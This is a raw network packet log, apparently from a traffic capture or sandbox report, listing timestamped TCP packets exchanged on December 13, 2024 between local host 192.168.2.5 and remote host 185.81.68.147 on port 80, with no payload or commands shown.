                                                                                                                                                                Dec 13, 2024 01:37:10.494148970 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.494189978 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.494919062 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.495049000 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.495089054 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.495887041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.495996952 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.496088028 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.496718884 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.496851921 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.496897936 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.497627020 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.497750044 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.497792006 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.498528004 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.498662949 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.498703957 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.499485016 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.499622107 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.499664068 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.500386953 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.500572920 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.500669003 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.501279116 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.501456022 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.501547098 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.502240896 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.502257109 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.502298117 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.503122091 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.503221989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.503289938 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.503993988 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.504137039 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.504179001 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.504916906 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.504971027 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.505012989 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.505815029 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.505951881 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.506047010 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.506728888 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.506839037 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.506884098 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.507659912 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.507755041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.507798910 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.508549929 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.508670092 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.508712053 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.509483099 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.509589911 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.509629965 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.510370970 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.510483027 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.510580063 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.511285067 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.511409998 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.511502028 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.512181044 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.512295961 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.512341976 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.513118982 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.513226986 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.513290882 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.514065981 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.514139891 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.514180899 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.514941931 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.515047073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.515089989 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.515820980 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.515944958 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.516033888 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.516772985 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.516901970 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.516944885 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.517668009 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.517748117 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.517786980 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.518564939 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.518668890 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.518712044 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.519462109 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.519572020 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.519613981 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.520379066 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.520469904 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.520517111 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.521362066 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.521507978 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.521552086 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.522186995 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.522317886 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.522358894 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.523102999 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.523284912 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.523351908 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.524019957 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.524127007 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.524167061 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.525029898 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.525185108 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.525228977 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.525815964 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.525949001 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.525998116 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.526741028 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.526839018 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.526882887 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.527662992 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.527923107 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.527964115 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.528563976 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.528772116 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.528817892 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.529459953 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.529650927 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.529691935 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.530401945 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.530510902 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.530553102 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.531286001 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.531411886 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.531455040 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.532195091 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.532356977 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.532397985 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.533119917 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.533221960 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.533263922 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.534028053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.534121990 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.534167051 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.534938097 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.535042048 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.535093069 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.535859108 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.535989046 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.536086082 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.536760092 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.536935091 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.536978006 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.537661076 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.537770033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.537812948 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.538562059 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.538757086 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.538799047 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.539494038 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.539635897 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.539679050 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.540381908 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.583086014 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.684994936 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.685070038 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.685174942 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.685406923 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.685472965 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.685565948 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.686302900 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.686405897 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.686496973 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.687194109 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.687305927 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.687396049 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.688168049 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.688225985 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.688323021 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.689043999 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.689116001 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.689203978 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.689934015 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.690006971 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.690099001 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.690866947 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.690988064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.691077948 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.691756010 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.691879034 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.691970110 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.692671061 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.692799091 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.692893982 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.693587065 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.693701029 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.693753958 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.694480896 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.694614887 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.694706917 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.695386887 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.695516109 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.695616961 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.696300030 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.696410894 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.696505070 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.697220087 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.697344065 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.697431087 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.698133945 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.698265076 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.698353052 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.699071884 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.699198008 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.699285984 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.699965954 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.700054884 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.700144053 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.700846910 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.700997114 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.701091051 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.701801062 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.701919079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.702028036 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.702688932 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.702756882 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.702843904 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.703591108 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.703692913 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.703784943 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.704488993 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.704549074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.704642057 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.705388069 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.705557108 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.705646992 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.706295967 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.706396103 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.706485987 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.707195997 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.707298994 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.707389116 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.708187103 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.708311081 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.708431959 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.709155083 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.709208965 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.709263086 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.709947109 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.710046053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.710139990 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.710882902 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.711055994 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.711148977 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.711782932 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.711920977 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.712009907 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.712660074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.712737083 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.712829113 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.713617086 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.713709116 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.713804960 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.714510918 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.714632988 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.714721918 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.715403080 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.715549946 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.715636969 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.716326952 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.716432095 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.716531038 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.717211962 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.717318058 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.717406034 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.718132973 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.718230963 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.718322039 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.719031096 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.719142914 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.719233036 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.719954967 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.720067978 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.720158100 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.720863104 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.721003056 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.721093893 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.721759081 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.721899033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.721987963 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.722662926 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.722805023 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.722893953 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.723581076 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.723685026 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.723773956 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.724490881 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.724562883 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.724611998 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.725398064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.725590944 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.725687981 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.726376057 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.726475954 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.726562023 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.727241993 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.727354050 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.727443933 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:10.728159904 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:10.728243113 CET8049707185.81.68.147192.168.2.5
